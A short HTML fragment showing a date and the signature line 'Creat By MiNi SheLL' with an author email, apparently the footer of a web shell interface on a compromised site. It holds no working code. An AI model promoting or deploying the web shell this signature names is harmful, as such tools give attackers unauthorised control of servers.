<span class="normal">do 2026-01-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com